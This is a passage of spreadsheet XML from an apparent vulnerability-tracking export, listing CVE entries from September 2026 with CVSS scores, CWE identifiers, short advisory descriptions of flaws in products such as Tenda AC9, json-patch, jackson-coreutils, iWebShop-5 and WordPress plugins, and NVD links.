        </is>
      </c>
      <c r="C4785" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4785" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4785" s="5" t="inlineStr"/>
      <c r="F4785" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4785" s="5" t="inlineStr"/>
      <c r="H4785" s="5" t="inlineStr"/>
      <c r="I4785" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4785" s="5" t="inlineStr"/>
      <c r="K4785" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L4785" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Tenda AC9 15.03.05.14. This impacts the function R7WebsSecurityHandler of the component Web Management. This manipulation causes improper authentication. The attack may be initiated remotely. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="M4785" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86300</t>
        </is>
      </c>
    </row>
    <row r="4786">
      <c r="A4786" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4786" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86302</t>
        </is>
      </c>
      <c r="C4786" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4786" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4786" s="5" t="inlineStr"/>
      <c r="F4786" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4786" s="5" t="inlineStr"/>
      <c r="H4786" s="5" t="inlineStr"/>
      <c r="I4786" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4786" s="5" t="inlineStr"/>
      <c r="K4786" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="L4786" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in code-projects Hospital Information System 1.0. Affected by this vulnerability is an unknown functionality of the file /HIS/his.sql of the component SQL Database Backup File Handler. Performing a manipulation results in information disclosure. Remote exploitation of the attack is possible. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="M4786" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86302</t>
        </is>
      </c>
    </row>
    <row r="4787">
      <c r="A4787" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4787" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86305</t>
        </is>
      </c>
      <c r="C4787" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4787" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4787" s="5" t="inlineStr"/>
      <c r="F4787" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4787" s="5" t="inlineStr"/>
      <c r="H4787" s="5" t="inlineStr"/>
      <c r="I4787" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4787" s="5" t="inlineStr"/>
      <c r="K4787" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-434</t>
        </is>
      </c>
      <c r="L4787" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in light0011 cms c774dce31c6df0055568a8d5c53d964d99be199d/f72cf46f601efb2a0618c3814cc2f61380b38930. Affected by this issue is the function Upload::upload of the file ThinkPHP/Library/Think/Upload.class.php. Performing a manipulation results in unrestricted upload. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4787" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86305</t>
        </is>
      </c>
    </row>
    <row r="4788">
      <c r="A4788" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4788" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86306</t>
        </is>
      </c>
      <c r="C4788" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4788" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4788" s="5" t="inlineStr"/>
      <c r="F4788" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4788" s="5" t="inlineStr"/>
      <c r="H4788" s="5" t="inlineStr"/>
      <c r="I4788" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4788" s="5" t="inlineStr"/>
      <c r="K4788" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L4788" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in light0011 cms c774dce31c6df0055568a8d5c53d964d99be199d/f72cf46f601efb2a0618c3814cc2f61380b38930. This affects an unknown part of the file App/Home/Model/UserModel.class.php of the component Cookie Helper. Executing a manipulation of the argument Username can lead to improper authentication. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4788" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86306</t>
        </is>
      </c>
    </row>
    <row r="4789">
      <c r="A4789" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4789" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86308</t>
        </is>
      </c>
      <c r="C4789" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4789" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4789" s="5" t="inlineStr"/>
      <c r="F4789" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4789" s="5" t="inlineStr"/>
      <c r="H4789" s="5" t="inlineStr"/>
      <c r="I4789" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4789" s="5" t="inlineStr"/>
      <c r="K4789" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="L4789" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in light0011 cms c774dce31c6df0055568a8d5c53d964d99be199d/f72cf46f601efb2a0618c3814cc2f61380b38930. This issue affects some unknown processing of the file App/Common/Conf/config.php of the component Debug Mode. The manipulation of the argument DB_DEBUG results in information disclosure. It is possible to launch the attack remotely. The exploit is now public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M4789" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86308</t>
        </is>
      </c>
    </row>
    <row r="4790">
      <c r="A4790" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4790" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86318</t>
        </is>
      </c>
      <c r="C4790" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4790" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4790" s="5" t="inlineStr"/>
      <c r="F4790" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4790" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4790" s="5" t="inlineStr"/>
      <c r="I4790" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4790" s="5" t="inlineStr"/>
      <c r="K4790" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="L4790" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in java-json-tools json-patch up to 1.13. Affected is the function JsonMergePatch.fromJson of the file JsonMergePatchDeserializer.java. Executing a manipulation can lead to stack-based buffer overflow. The attack may be performed from remote. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4790" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86318</t>
        </is>
      </c>
    </row>
    <row r="4791">
      <c r="A4791" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4791" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86319</t>
        </is>
      </c>
      <c r="C4791" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4791" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4791" s="5" t="inlineStr"/>
      <c r="F4791" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4791" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4791" s="5" t="inlineStr"/>
      <c r="I4791" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4791" s="5" t="inlineStr"/>
      <c r="K4791" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-404</t>
        </is>
      </c>
      <c r="L4791" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in java-json-tools json-patch up to 1.13. Affected by this vulnerability is the function JsonPatch.apply of the file src/main/java/com/github/fge/jsonpatch/JsonPatch.java of the component Patch Operation Handler. The manipulation leads to resource consumption. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4791" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86319</t>
        </is>
      </c>
    </row>
    <row r="4792">
      <c r="A4792" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4792" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86321</t>
        </is>
      </c>
      <c r="C4792" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4792" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4792" s="5" t="inlineStr"/>
      <c r="F4792" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4792" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4792" s="5" t="inlineStr"/>
      <c r="I4792" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4792" s="5" t="inlineStr"/>
      <c r="K4792" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L4792" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in java-json-tools jackson-coreutils 2.0. Affected by this issue is the function JsonLoader.fromURL of the file src/main/java/com/github/fge/jackson/JsonLoader.java of the component URL Validation. The manipulation results in server-side request forgery. It is possible to launch the attack remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4792" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86321</t>
        </is>
      </c>
    </row>
    <row r="4793">
      <c r="A4793" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4793" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86500</t>
        </is>
      </c>
      <c r="C4793" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4793" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4793" s="5" t="inlineStr"/>
      <c r="F4793" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4793" s="5" t="inlineStr"/>
      <c r="H4793" s="5" t="inlineStr"/>
      <c r="I4793" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4793" s="5" t="inlineStr"/>
      <c r="K4793" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="L4793" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.1.14047 a missing escalation check let a user with project update permissions grant themselves Project Admin</t>
        </is>
      </c>
      <c r="M4793" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86500</t>
        </is>
      </c>
    </row>
    <row r="4794">
      <c r="A4794" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4794" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86511</t>
        </is>
      </c>
      <c r="C4794" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4794" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4794" s="5" t="inlineStr"/>
      <c r="F4794" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4794" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4794" s="5" t="inlineStr"/>
      <c r="I4794" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4794" s="5" t="inlineStr"/>
      <c r="K4794" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-404</t>
        </is>
      </c>
      <c r="L4794" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in java-json-tools jackson-coreutils 2.0. Affected by this vulnerability is the function BigDecimal.toPlainString of the file src/main/java/com/github/fge/jackson/JacksonUtils.java. Performing a manipulation results in resource consumption. The attack may be initiated remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4794" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86511</t>
        </is>
      </c>
    </row>
    <row r="4795">
      <c r="A4795" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4795" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86513</t>
        </is>
      </c>
      <c r="C4795" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4795" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4795" s="5" t="inlineStr"/>
      <c r="F4795" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4795" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4795" s="5" t="inlineStr"/>
      <c r="I4795" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4795" s="5" t="inlineStr"/>
      <c r="K4795" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L4795" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in java-json-tools jackson-coreutils 2.0. This vulnerability affects the function TreePointer.tokensFromInput of the file src/main/java/com/github/fge/jackson/jsonpointer/TreePointer.java of the component JSON Pointer parser. The manipulation results in allocation of resources. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4795" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86513</t>
        </is>
      </c>
    </row>
    <row r="4796">
      <c r="A4796" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4796" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86519</t>
        </is>
      </c>
      <c r="C4796" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4796" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4796" s="5" t="inlineStr"/>
      <c r="F4796" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4796" s="5" t="inlineStr"/>
      <c r="H4796" s="5" t="inlineStr"/>
      <c r="I4796" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4796" s="5" t="inlineStr"/>
      <c r="K4796" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="L4796" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in code-projects Student Crud Operation 1.0. This impacts an unknown function of the file /card_activation.sql of the component Backup File Handler. The manipulation results in information disclosure. The attack can be launched remotely. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="M4796" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86519</t>
        </is>
      </c>
    </row>
    <row r="4797">
      <c r="A4797" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4797" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86665</t>
        </is>
      </c>
      <c r="C4797" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4797" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4797" s="5" t="inlineStr"/>
      <c r="F4797" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4797" s="5" t="inlineStr"/>
      <c r="H4797" s="5" t="inlineStr"/>
      <c r="I4797" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4797" s="5" t="inlineStr"/>
      <c r="K4797" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="L4797" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in aircheng-org iWebShop-5 up to 5.15. This issue affects the function Update::index of the file controllers/update.php. The manipulation leads to missing authorization. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4797" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86665</t>
        </is>
      </c>
    </row>
    <row r="4798">
      <c r="A4798" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4798" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86666</t>
        </is>
      </c>
      <c r="C4798" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4798" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4798" s="5" t="inlineStr"/>
      <c r="F4798" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4798" s="5" t="inlineStr"/>
      <c r="H4798" s="5" t="inlineStr"/>
      <c r="I4798" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4798" s="5" t="inlineStr"/>
      <c r="K4798" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-434</t>
        </is>
      </c>
      <c r="L4798" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in aircheng-org iWebShop-5 up to 5.15. Impacted is the function upload_json/uploadFile of the file controllers/pic.php. The manipulation results in unrestricted upload. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4798" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86666</t>
        </is>
      </c>
    </row>
    <row r="4799">
      <c r="A4799" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4799" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86669</t>
        </is>
      </c>
      <c r="C4799" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4799" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4799" s="5" t="inlineStr"/>
      <c r="F4799" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4799" s="5" t="inlineStr"/>
      <c r="H4799" s="5" t="inlineStr"/>
      <c r="I4799" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4799" s="5" t="inlineStr"/>
      <c r="K4799" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L4799" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in aircheng-org iWebShop-5 up to 5.15. This affects the function Login of the file controllers/systemseller.php. Performing a manipulation of the argument Name results in improper authentication. It is possible to initiate the attack remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4799" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86669</t>
        </is>
      </c>
    </row>
    <row r="4800">
      <c r="A4800" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4800" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86672</t>
        </is>
      </c>
      <c r="C4800" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4800" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4800" s="5" t="inlineStr"/>
      <c r="F4800" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4800" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="H4800" s="5" t="inlineStr"/>
      <c r="I4800" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4800" s="5" t="inlineStr"/>
      <c r="K4800" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="L4800" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in ningzichun Student Management System up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected is an unknown function of the file example.7z of the component Backup Handler. The manipulation leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4800" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86672</t>
        </is>
      </c>
    </row>
    <row r="4801">
      <c r="A4801" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4801" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86673</t>
        </is>
      </c>
      <c r="C4801" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4801" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4801" s="5" t="inlineStr"/>
      <c r="F4801" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4801" s="5" t="inlineStr">
        <is>
          <t>f5, mysql</t>
        </is>
      </c>
      <c r="H4801" s="5" t="inlineStr"/>
      <c r="I4801" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4801" s="5" t="inlineStr"/>
      <c r="K4801" s="5" t="inlineStr">
        <is>
          <t>CWE-259, CWE-798</t>
        </is>
      </c>
      <c r="L4801" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in ningzichun Student Management System up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected by this issue is the function mysqli_connect of the file config/database.php of the component Database Connection. This manipulation causes hard-coded credentials. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4801" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86673</t>
        </is>
      </c>
    </row>
    <row r="4802">
      <c r="A4802" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4802" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86716</t>
        </is>
      </c>
      <c r="C4802" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4802" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4802" s="5" t="inlineStr"/>
      <c r="F4802" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4802" s="5" t="inlineStr"/>
      <c r="H4802" s="5" t="inlineStr"/>
      <c r="I4802" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4802" s="5" t="inlineStr"/>
      <c r="K4802" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-122</t>
        </is>
      </c>
      <c r="L4802" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Cesanta mJS up to 1.26. Affected is the function skip_spaces_and_comments of the file src/mjs_tok.c. Executing a manipulation can lead to heap-based buffer overflow. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4802" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86716</t>
        </is>
      </c>
    </row>
    <row r="4803">
      <c r="A4803" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4803" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86782</t>
        </is>
      </c>
      <c r="C4803" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4803" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4803" s="5" t="inlineStr"/>
      <c r="F4803" s="5" t="inlineStr"/>
      <c r="G4803" s="5" t="inlineStr"/>
      <c r="H4803" s="5" t="inlineStr"/>
      <c r="I4803" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4803" s="5" t="inlineStr"/>
      <c r="K4803" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L4803" s="5" t="inlineStr">
        <is>
          <t>The Visualizer  WordPress plugin before 4.0.6 does not properly authorise access to its chart-building actions, allowing users with the Contributor role and above to publish, rename, and overwrite the content of posts and pages they do not own, including other users' private drafts.</t>
        </is>
      </c>
      <c r="M4803" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86782</t>
        </is>
      </c>
    </row>
    <row r="4804">
      <c r="A4804" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4804" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86808</t>
        </is>
      </c>
      <c r="C4804" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4804" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4804" s="5" t="inlineStr"/>
      <c r="F4804" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G4804" s="5" t="inlineStr"/>
      <c r="H4804" s="5" t="inlineStr"/>
      <c r="I4804" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4804" s="5" t="inlineStr"/>
      <c r="K4804" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="L4804" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in moltis-org moltis up to 20260818.10. The affected element is the function vault_unlock_handler/vault_recovery_handler of the file vault.rs. Such manipulation leads to missing authentication. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 20260819.01 is sufficient to fix this issue. The name of the patch is 3b92dd64d5648f829968cf48bf67dc3113852fef. Upgrading the affected component is advised.</t>
        </is>
      </c>
      <c r="M4804" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86808</t>
        </is>
      </c>
    </row>
    <row r="4805">
      <c r="A4805" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4805" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86815</t>
        </is>
      </c>
      <c r="C4805" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4805" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4805" s="5" t="inlineStr"/>
      <c r="F4805" s="5" t="inlineStr"/>
      <c r="G4805" s="5" t="inlineStr"/>
      <c r="H4805" s="5" t="inlineStr"/>
      <c r="I4805" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4805" s="5" t="inlineStr"/>
      <c r="K4805" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4805" s="5" t="inlineStr">
        <is>
          <t>The BackWPup  WordPress plugin before 5.7.5 does not properly restrict access to several of its REST API routes for job, backup-destination, and backup-execution management, allowing users holding a BackWPup  WordPress plugin before 5.7.5-defined, administrator-assigned limited role to create and run backup jobs and exfiltrate a full database backup to an attacker-controlled destination.</t>
        </is>
      </c>
      <c r="M4805" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86815</t>
        </is>
      </c>
    </row>
    <row r="4806">
      <c r="A4806" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4806" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87552</t>
        </is>
      </c>
      <c r="C4806" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4806" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
